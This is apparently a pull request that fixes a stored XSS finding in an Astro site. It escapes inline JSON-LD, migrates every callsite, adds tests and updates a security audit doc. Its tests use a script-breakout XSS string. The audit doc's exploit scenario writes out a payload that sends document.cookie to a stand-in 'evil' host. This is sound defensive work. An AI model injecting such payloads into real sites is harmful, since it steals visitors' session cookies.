### PR TITLE
feat(seo): close M-7 — JsonLd escape + 16 callsite migration (Story 24.5)

### DIFF
--- a/astro-app/src/components/ui/json-ld/JsonLd.astro
+++ b/astro-app/src/components/ui/json-ld/JsonLd.astro
@@ -3,13 +3,37 @@ import { stegaClean } from '@sanity/client/stega';
 
 interface Props {
   schema: Record<string, unknown> | Record<string, unknown>[];
+  slot?: string;
 }
 
-const { schema } = Astro.props;
+const { schema, slot } = Astro.props;
 const cleaned = stegaClean(schema);
 const output = Array.isArray(cleaned)
-  ? cleaned.map(s => ({ '@context': 'https://schema.org', ...s }))
-  : { '@context': 'https://schema.org', ...cleaned };
+  ? cleaned.map((s) => ({ '@context': 'https://schema.org', ...(s as Record<string, unknown>) }))
+  : { '@context': 'https://schema.org', ...(cleaned as Record<string, unknown>) };
+
+// Escape the stringified JSON for safe embedding inside an inline <script> block.
+// `<` / `>` / `&` defeat </script> close-tag breakout and HTML-comment-form smuggling;
+// U+2028 / U+2029 are JS line terminators that can break single-line JSON output.
+// Reference: https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
+//
+// The U+2028/U+2029 source chars cannot appear inside a /.../ regex literal —
+// esbuild treats them as newlines and the regex won't parse. Use RegExp() so
+// the unicode escape stays a string until runtime.
+const ESCAPE_MAP: Record<string, string> = {
+  '<': '\\u003c',
+  '>': '\\u003e',
+  '&': '\\u0026',
+  ' ': '\\u2028',
+  ' ': '\\u2029',
+};
+const ESCAPE_RE = new RegExp('[<>&\\u2028\\u2029]', 'g');
+
+function escapeForInlineScript(json: string): string {
+  return json.replace(ESCAPE_RE, (c) => ESCAPE_MAP[c]);
+}
+
+const safeJson = escapeForInlineScript(JSON.stringify(output));
 ---
 
-<script type="application/ld+json" set:html={JSON.stringify(output)} />
+<script type="application/ld+json" set:html={safeJson} slot={slot} />

--- a/astro-app/src/components/ui/json-ld/__tests__/JsonLd.test.ts
+++ b/astro-app/src/components/ui/json-ld/__tests__/JsonLd.test.ts
@@ -1,0 +1,135 @@
+import { experimental_AstroContainer as AstroContainer } from 'astro/container';
+import { describe, test, expect } from 'vitest';
+import JsonLd from '../JsonLd.astro';
+
+// Pull the JSON body out of the rendered <script type="application/ld+json">…</script>.
+function extractScriptBody(html: string): string {
+  const match = html.match(
+    /<script[^>]*type="application\/ld\+json"[^>]*>([\s\S]*?)<\/script>/,
+  );
+  if (!match) throw new Error(`No JSON-LD <script> tag found in: ${html}`);
+  return match[1];
+}
+
+// Reverse the unicode escapes we apply in escapeForInlineScript so we can
+// assert the original JSON parses back to the input shape.
+function decodeEscapes(s: string): string {
+  return s
+    .replace(/\\u003c/g, '<')
+    .replace(/\\u003e/g, '>')
+    .replace(/\\u0026/g, '&')
+    .replace(/\\u2028/g, ' ')
+    .replace(/\\u2029/g, ' ');
+}
+
+describe('JsonLd', () => {
+  test('escapes </script> in string fields', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: {
+        schema: { name: 'Acme</script><script>alert(1)</script>' },
+      },
+    });
+
+    const body = extractScriptBody(html);
+    expect(body).toContain('\\u003c/script\\u003e');
+    expect(body).toContain('\\u003cscript\\u003ealert(1)\\u003c/script\\u003e');
+    // The body itself must not contain a literal closing tag that would
+    // terminate the inline <script> early.
+    expect(body).not.toContain('</script>');
+    expect(body).not.toContain('<script>');
+  });
+
+  test('escapes & to \\u0026', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: { schema: { description: 'A & B' } },
+    });
+
+    const body = extractScriptBody(html);
+    expect(body).toContain('A \\u0026 B');
+    expect(body).not.toMatch(/[^\\]&/);
+  });
+
+  test('escapes U+2028 / U+2029 line terminators', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: {
+        schema: {
+          ls: 'before after',
+          ps: 'before after',
+        },
+      },
+    });
+
+    const body = extractScriptBody(html);
+    expect(body).toContain('\\u2028');
+    expect(body).toContain('\\u2029');
+    expect(body).not.toContain(' ');
+    expect(body).not.toContain(' ');
+  });
+
+  test('preserves valid JSON parseability after decoding escapes', async () => {
+    const container = await AstroContainer.create();
+    const input = {
+      '@type': 'Organization',
+      name: 'Acme</script>',
+      description: 'A & B',
+      sep: 'x y z',
+    };
+    const html = await container.renderToString(JsonLd, {
+      props: { schema: input },
+    });
+
+    const body = extractScriptBody(html);
+    const decoded = decodeEscapes(body);
+    const parsed = JSON.parse(decoded);
+
+    expect(parsed['@context']).toBe('https://schema.org');
+    expect(parsed['@type']).toBe('Organization');
+    expect(parsed.name).toBe('Acme</script>');
+    expect(parsed.description).toBe('A & B');
+    expect(parsed.sep).toBe('x y z');
+  });
+
+  test('forwards slot prop to the rendered <script> tag', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: {
+        schema: { name: 'plain' },
+        slot: 'structured-data',
+      },
+    });
+
+    expect(html).toMatch(/<script[^>]*slot="structured-data"[^>]*>/);
+  });
+
+  test('omits slot attribute when no slot prop is passed', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: { schema: { name: 'plain' } },
+    });
+
+    expect(html).not.toMatch(/<script[^>]*slot=/);
+  });
+
+  test('handles array schemas by wrapping each entry with @context', async () => {
+    const container = await AstroContainer.create();
+    const html = await container.renderToString(JsonLd, {
+      props: {
+        schema: [
+          { '@type': 'Organization', name: 'A' },
+          { '@type': 'Person', name: 'B</script>' },
+        ],
+      },
+    });
+
+    const body = extractScriptBody(html);
+    const parsed = JSON.parse(decodeEscapes(body));
+    expect(Array.isArray(parsed)).toBe(true);
+    expect(parsed[0]['@context']).toBe('https://schema.org');
+    expect(parsed[1]['@context']).toBe('https://schema.org');
+    expect(parsed[1].name).toBe('B</script>');
+    expect(body).not.toContain('</script>');
+  });
+});

--- a/astro-app/src/layouts/Layout.astro
+++ b/astro-app/src/layouts/Layout.astro
@@ -14,6 +14,7 @@ import { PUBLIC_SANITY_VISUAL_EDITING_ENABLED, PUBLIC_GTM_ID, PUBLIC_SITE_THEME,
 import type { SeoProps } from "@/lib/types";
 import { buildOrgJsonLd } from "@/lib/org-jsonld";
 import { buildPageGraph } from "@/lib/page-jsonld";
+import JsonLd from "@/components/ui/json-ld/JsonLd.astro";
 
 interface Props {
   title?: string;
@@ -125,7 +126,7 @@ const fallbackOrgJsonLd = hasStructuredData ? null : buildPageGraph(await buildO
       http-equiv="Content-Security-Policy"
       content={cspContent}
     />
-    {hasStructuredData ? <slot name="structured-data" /> : <script type="application/ld+json" set:html={JSON.stringify(fallbackOrgJsonLd)} />}
+    {hasStructuredData ? <slot name="structured-data" /> : <JsonLd schema={fallbackOrgJsonLd!} />}
     {preloadImage && !preloadImageSrcset && <link rel="preload" as="image" href={preloadImage} fetchpriority="high" />}
     {preloadImageSrcset && <link rel="preload" as="image" imagesrcset={preloadImageSrcset} imagesizes={preloadImageSizes || '100vw'} fetchpriority="high" />}
     <title>{fullTitle}</title>

--- a/astro-app/src/lib/__tests__/article-jsonld.test.ts
+++ b/astro-app/src/lib/__tests__/article-jsonld.test.ts
@@ -581,8 +581,7 @@ describe('articles/[slug].astro integration', () => {
 
   test('emits structured data via structured-data slot', () => {
     expect(content).toContain('slot="structured-data"');
-    expect(content).toContain('application/ld+json');
-    expect(content).toContain('pageGraph');
+    expect(content).toMatch(/<JsonLd[^>]*schema={pageGraph}/);
   });
 });
 

--- a/astro-app/src/lib/__tests__/author-jsonld.test.ts
+++ b/astro-app/src/lib/__tests__/author-jsonld.test.ts
@@ -362,7 +362,6 @@ describe('authors/[slug].astro — JSON-LD integration', () => {
 
   test('emits structured data via structured-data slot', () => {
     expect(pageContent).toContain('slot="structured-data"');
-    expect(pageContent).toContain('application/ld+json');
-    expect(pageContent).toContain('pageGraph');
+    expect(pageContent).toMatch(/<JsonLd[^>]*schema={pageGraph}/);
   });
 });

--- a/astro-app/src/pages/articles/[slug].astro
+++ b/astro-app/src/pages/articles/[slug].astro
@@ -22,6 +22,7 @@ import { buildArticleJsonLd } from '@/lib/article-jsonld';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 import ArticleNewsletterCta from '@/components/ArticleNewsletterCta.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
@@ -91,7 +92,7 @@ const cleanAuthorSlug = authorSlug;
       <meta property="article:tag" content={tag} />
     ))}
   </Fragment>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
 
   <Section>
     <SectionContent>

--- a/astro-app/src/pages/articles/category/[slug].astro
+++ b/astro-app/src/pages/articles/category/[slug].astro
@@ -18,6 +18,7 @@ import type { ALL_ARTICLE_CATEGORY_SLUGS_QUERY_RESULT } from '@/sanity.types';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
   // Use the generated GROQ result type so the slug-list shape stays in
@@ -72,7 +73,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
   title={categoryTitle}
   seo={{ metaDescription }}
 >
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <Section>
     <SectionContent>
       <Breadcrumb items={breadcrumbItems} />

--- a/astro-app/src/pages/articles/index.astro
+++ b/astro-app/src/pages/articles/index.astro
@@ -13,6 +13,7 @@ import { stegaClean } from '@sanity/client/stega';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 const [articles, categories, listingPage] = await Promise.all([
   getAllArticles(),
@@ -52,7 +53,7 @@ function heroSrcset(article: Article): string | undefined {
 ---
 
 <Layout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} />
   )}

--- a/astro-app/src/pages/authors/[slug].astro
+++ b/astro-app/src/pages/authors/[slug].astro
@@ -15,6 +15,7 @@ import { buildAuthorJsonLd } from '@/lib/author-jsonld';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
   const authors = await sanityClient.fetch<ALL_AUTHOR_SLUGS_QUERY_RESULT>(ALL_AUTHOR_SLUGS_QUERY, getSiteParams());
@@ -64,7 +65,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd, authorJsonLd);
   title={`${author.name ?? 'Author'} | Authors`}
   seo={metaDescription ? { metaDescription } : undefined}
 >
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <Section>
     <SectionContent>
       <Breadcrumb items={breadcrumbItems} />

--- a/astro-app/src/pages/authors/index.astro
+++ b/astro-app/src/pages/authors/index.astro
@@ -9,6 +9,7 @@ import { getAllAuthors, getListingPage } from '@/lib/sanity';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 const [authors, listingPage] = await Promise.all([
   getAllAuthors(),
@@ -29,7 +30,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <Layout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} />
   )}

--- a/astro-app/src/pages/events/[slug].astro
+++ b/astro-app/src/pages/events/[slug].astro
@@ -12,6 +12,7 @@ import { Section, SectionContent } from '@/components/ui/section';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
   const events = await sanityClient.fetch<ALL_EVENT_SLUGS_QUERY_RESULT>(ALL_EVENT_SLUGS_QUERY, getSiteParams());
@@ -87,7 +88,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd, eventJsonLd);
 ---
 
 <Layout title={event.title ?? 'Event'} seo={event.seo ?? (event.description ? { metaDescription: event.description } : undefined)} template="detail">
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
 
   <Section>
     <SectionContent>

--- a/astro-app/src/pages/events/index.astro
+++ b/astro-app/src/pages/events/index.astro
@@ -11,6 +11,7 @@ import EventCalendarIsland from '@/components/react/EventCalendarIsland';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 const [events, listingPage] = await Promise.all([
   getAllEvents(),
@@ -31,7 +32,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <Layout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} />
   )}

--- a/astro-app/src/pages/gallery/index.astro
+++ b/astro-app/src/pages/gallery/index.astro
@@ -9,6 +9,7 @@ import { getListingPage, getGalleryAssets } from '@/lib/sanity';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 const [listingPage, galleryItems] = await Promise.all([
   getListingPage('gallery'),
@@ -29,7 +30,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <Layout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} />
   )}

--- a/astro-app/src/pages/portal/events.astro
+++ b/astro-app/src/pages/portal/events.astro
@@ -9,6 +9,7 @@ import { loadQuery, ALL_EVENTS_QUERY, SPONSOR_BY_EMAIL_QUERY, getSiteParams, get
 import type { ALL_EVENTS_QUERY_RESULT, SPONSOR_BY_EMAIL_QUERY_RESULT } from "@/sanity.types";
 import { buildBreadcrumbJsonLd } from "@/lib/breadcrumb-jsonld";
 import { buildPageGraph } from "@/lib/page-jsonld";
+import JsonLd from "@/components/ui/json-ld/JsonLd.astro";
 
 const user = Astro.locals.user;
 
@@ -37,7 +38,7 @@ const pageGraph = buildPageGraph(breadcrumbJsonLd);
 ---
 
 <PortalLayout title={pageTitle} activeNav="/portal/events" sponsorSlug={sponsor?.slug}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <div class="flex flex-col gap-6">
     <Breadcrumb items={breadcrumbItems} />
 

--- a/astro-app/src/pages/portal/progress.astro
+++ b/astro-app/src/pages/portal/progress.astro
@@ -6,6 +6,7 @@ import Breadcrumb from '@/components/Breadcrumb.astro';
 import BlockRenderer from '@/components/BlockRenderer.astro';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 import GitHubDashboard from '@/components/portal/GitHubDashboard';
 import RepoLinker from '@/components/portal/RepoLinker';
 import { getDrizzle } from '@/lib/db';
@@ -166,7 +167,7 @@ const pageGraph = buildPageGraph(breadcrumbJsonLd);
 ---
 
 <PortalLayout title={pageTitle} activeNav="/portal/progress" sponsorSlug={sponsor?.slug}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <div class="flex flex-col gap-6">
     <Breadcrumb items={breadcrumbItems} />
 

--- a/astro-app/src/pages/projects/[slug].astro
+++ b/astro-app/src/pages/projects/[slug].astro
@@ -16,6 +16,7 @@ import { portableTextComponents } from '@/components/portable-text';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
   const projects = await sanityClient.fetch<ALL_PROJECT_SLUGS_QUERY_RESULT>(ALL_PROJECT_SLUGS_QUERY, getSiteParams());
@@ -63,7 +64,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <Layout title={project.title ?? 'Project'} seo={project.seo ?? (project.outcome ? { metaDescription: project.outcome } : undefined)} ogType="article" template="detail">
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <Section>
     <SectionContent>
       <Breadcrumb items={breadcrumbItems} />

--- a/astro-app/src/pages/projects/index.astro
+++ b/astro-app/src/pages/projects/index.astro
@@ -11,6 +11,7 @@ import ProjectFilterBar from '@/components/ProjectFilterBar.astro';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 import ProjectPageHeader from '@/components/ProjectPageHeader.astro';
 import ProjectEmptyState from '@/components/ProjectEmptyState.astro';
 
@@ -36,7 +37,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <SidebarLayout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} slot="header" />
   )}

--- a/astro-app/src/pages/sponsors/[slug].astro
+++ b/astro-app/src/pages/sponsors/[slug].astro
@@ -13,6 +13,7 @@ import { Section, SectionContent } from '@/components/ui/section';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 export const getStaticPaths: GetStaticPaths = async () => {
   const sponsors = await sanityClient.fetch<ALL_SPONSOR_SLUGS_QUERY_RESULT>(ALL_SPONSOR_SLUGS_QUERY, getSiteParams());
@@ -61,7 +62,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd, sponsorJsonLd);
 ---
 
 <Layout title={sponsor.name ?? 'Sponsor'} seo={sponsor.seo ?? (sponsor.description ? { metaDescription: sponsor.description } : undefined)} template="detail">
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   <Section>
     <SectionContent>
       <Breadcrumb items={breadcrumbItems} />

--- a/astro-app/src/pages/sponsors/index.astro
+++ b/astro-app/src/pages/sponsors/index.astro
@@ -9,6 +9,7 @@ import SponsorCard from '@/components/SponsorCard.astro';
 import { buildBreadcrumbJsonLd } from '@/lib/breadcrumb-jsonld';
 import { buildPageGraph } from '@/lib/page-jsonld';
 import { buildOrgJsonLd } from '@/lib/org-jsonld';
+import JsonLd from '@/components/ui/json-ld/JsonLd.astro';
 
 const [sponsors, listingPage] = await Promise.all([
   getAllSponsors(),
@@ -30,7 +31,7 @@ const pageGraph = buildPageGraph(orgJsonLd, breadcrumbJsonLd);
 ---
 
 <Layout title={pageTitle} seo={pageSeo}>
-  <script slot="structured-data" type="application/ld+json" set:html={JSON.stringify(pageGraph)} />
+  <JsonLd schema={pageGraph} slot="structured-data" />
   {listingPage?.headerBlocks && listingPage.headerBlocks.length > 0 && (
     <BlockRenderer blocks={listingPage.headerBlocks} />
   )}

--- a/docs/security-audit-2026-04-30.md
+++ b/docs/security-audit-2026-04-30.md
@@ -157,6 +157,10 @@ The newer auth/portal API surface (Better Auth + middleware + portal routes) has
 - **Description:** Pattern `<script type="application/ld+json" set:html={JSON.stringify(pageGraph)} />` interpolates Sanity-authored fields (sponsor name/description, article headline/excerpt, author name/bio, breadcrumb labels, siteSettings.siteName) into an inline script. `JSON.stringify` does **not** escape `<`, `>`, or `/`, so the substring `</script>` placed inside any field terminates the inline script tag at parse time and what follows is interpreted as HTML. CSP at `layouts/Layout.astro:84` is `script-src 'self' 'unsafe-inline'` (no nonce), so injected inline scripts execute.
 - **Exploit Scenario:** A Sanity editor (intentional, social-engineered, or via stolen credentials) sets sponsor `name` to `Acme</script><script>fetch('//evil/'+document.cookie)</script>`. Every visitor's browser exfiltrates auth/session cookies (incl. portal Better-Auth session for any logged-in sponsor or admin viewing the page).
 - **Fix:** Escape JSON for safe inline embedding before injection: `JSON.stringify(graph).replace(/</g,'\\u003c').replace(/>/g,'\\u003e').replace(/&/g,'\\u0026').replace(/ /g,'\\u2028').replace(/ /g,'\\u2029')`. Best implemented as a single `<JsonLd schema={...} />` component used everywhere. Even better: drop `'unsafe-inline'`, adopt nonces (Astro 5+ experimental CSP feature).
+- **Status: RESOLVED 2026-05-05 via Story 24.5.**
+  - `JsonLd.astro` escapes `<`, `>`, `&`, U+2028, U+2029 once after `JSON.stringify` (per the "Fix" recipe above, factored into a single `escapeForInlineScript()` helper).
+  - All 16 inline `<script type="application/ld+json" set:html={...}>` callsites (14 pages + Layout fallback + the component itself) migrated to `<JsonLd schema={pageGraph} slot="structured-data" />`. Build-output grep over `astro-app/src/pages` + `astro-app/src/layouts` returns zero matches.
+  - CSP nonce adoption (drop `'unsafe-inline'`) filed as follow-up TODO in Story 24.5 PR Summary; not blocked by anything but out of scope for this story.
 
 ### M-8: Stored XSS via Sanity-authored `EmbedBlock.rawEmbedCode`
 - **Files:** `astro-app/src/components/blocks/custom/EmbedBlock.astro:38, 75, 112`; schema `studio/src/schemaTypes/blocks/embed-block.ts:32`
@@ -210,7 +214,7 @@ All routes gated by middleware (session + role + sponsor whitelist + agreement a
 1. [x] **H-1** — rotate `STUDIO_ADMIN_TOKEN`; refactor `SponsorAcceptancesTool` to authenticate via Studio user identity rather than a shared bearer. (Highest blast radius, simplest fix.) **RESOLVED 2026-05-01 via Story 24.1.**
 2. [x] **H-3** — set `disableSignUp: true` on magic link, `allowDifferentEmails: false` on account linking. One-line config changes. **RESOLVED 2026-05-05 via Story 24.2.**
 3. **M-1, M-2** — add unsubscribe token + double-opt-in to `/api/subscribe`. New random column + email flow.
-4. **M-7, M-8** — introduce `<JsonLd>` component with proper escaping; sandbox or DOMPurify the `EmbedBlock`.
+4. [x] **M-7, M-8** — introduce `<JsonLd>` component with proper escaping; sandbox or DOMPurify the `EmbedBlock`. **RESOLVED 2026-05-05 via Story 24.5 (M-7) + Story 24.6 (M-8).**
 5. **H-2** — switch `SESSION_CACHE` to hashed keys + stored `expiresAt`, or remove and rely on Better Auth `cookieCache`.
 6. [x] **M-3** — replace request-reflective `trustedOrigins`/`baseURL` with `CLOUDFLARE_ENV`-driven static allowlist. **RESOLVED 2026-05-05 via Story 24.2.**
 7. [x] **M-4** — restrict who can edit `sponsor.allowedEmails` in Studio. **RESOLVED 2026-05-05 via Story 24.7.**


### PR DESCRIPTION
## Summary
- Closes audit finding **M-7** (`docs/security-audit-2026-04-30.md`).
- `astro-app/src/components/ui/json-ld/JsonLd.astro` runs `escapeForInlineScript()` once after `JSON.stringify` (and after `stegaClean`): escapes \`<\` \`>\` \`&\` U+2028 U+2029 to \`\\u00xx\` form. Implementation uses a `RegExp(...)` constructor + lookup-map (the `/.../g` literal form is rejected by esbuild when it contains literal U+2028/U+2029).
- Component accepts an optional `slot` prop forwarded to the underlying `<script>`.
- All 14 page-level inline `<script type="application/ld+json" set:html={JSON.stringify(pageGraph)} />` callsites + the `Layout.astro:128` fallback migrated to `<JsonLd schema={pageGraph} slot="structured-data" />`. `grep -rn "set:html.*JSON.stringify" astro-app/src/{pages,layouts}` returns zero.

## Test plan
- [x] `npm run test:unit` — 7 new `JsonLd.test.ts` cases (close-tag breakout, `&` smuggling, U+2028/U+2029, JSON parseability after decode, slot prop forward + omit, array schemas) all green.
- [x] Two pre-existing string-content assertions in `article-jsonld.test.ts` / `author-jsonld.test.ts` updated for the new `<JsonLd>` pattern.
- [x] Suite: 2145 passed / 1 pre-existing failure (`ImageGallery > creator Organization` — verified unrelated by stash-test) / 27 skipped.
- [ ] **Manual ops Jay still owes:** file GH issue "Adopt Astro CSP nonces and drop \`script-src 'unsafe-inline'\`" (the deeper hardening; 24.5 closes the immediate breakout via escape).

## Stack
- #706 → 24.2
- #707 → 24.6
- #708 → 24.7 (this PR's base)
- **this PR** → 24.5 (top of stack)